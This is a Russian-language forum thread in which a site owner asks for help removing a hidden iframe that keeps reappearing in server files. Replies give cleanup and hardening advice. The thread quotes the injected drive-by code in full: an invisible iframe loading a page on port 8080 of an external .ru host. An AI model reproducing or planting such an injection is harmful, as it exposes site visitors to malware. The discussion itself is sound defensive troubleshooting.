Млин, совсем меня извел, не могу не как удалить на сервере iframe, grep-ом ищу в файлах .php .shtml .html по названию iframe, чищу все что находит, но через какое-то время они опять заражаются, вот такой куйней
<iframe src="http://x3y.ru:8080/index.php" width=116 height=134 style="visibility: hidden"></iframe>
чье это? :D

вообщем прошу помощи, уже несколько раз менял пароли на фтп и на рута, проверял свой локальный комп разными сканерами, curelt/AVZ/KasperskyVRT, поменял фтп клиента, но не помогло :(

проверь cron:))

Может у тебя хостера похакали?

поиши еще по base64 (шелл может) + пасс от ФТП смени (за дурака не держу, просто не писал ты о этом действии).

уже несколько раз менял пароли на фтп и на рута

Смени владельца файла и поставь права тока на чтение.
Но лучше курить логи и дырку латать ;)

Сам недавно столкнулся с этой заразой. Пришлось чистить сотни страниц на нескольких серверах.
Помог этот простенький скрипт (может кому пригодится чтобы не чистить руками):

find . -type f -name '*.php' | xargs perl -p -i -e 's/.*malware_domain.*$//g'

Б большинстве случаев причина заражения - на стороне клиента. Трой ворует пароли ftp - после делает конет на сервак, ищет файлы заглавных страниц index.php index.html main.html page.html и делает инъекцию кода.

Поэтому первое лекарство - свежий бесплатный антивирус с новыми базами http://www.freedrweb.com/cureit/ Ну и конечно же поиск багов на сайте.

у вас троян пишет в скриптах iframe. создает себе место где пихает ссылки на ресурсы. он гадит скрипты и если это онлайн сайт, Гугл сканирует код и находит и считает как вредоносное ПО для компа. У меня было несколько таких случий на наших серверах. Рекомендую менять все пароли на сложные, очистить все скрипты, и поработать над дырами скриптов и улучшить безопасность. Потом, если это сайт, надо сообщить Гуглу что вы предприняли все меры чтоб скрипты работали нормально и чтоб они переиндексировали сайт.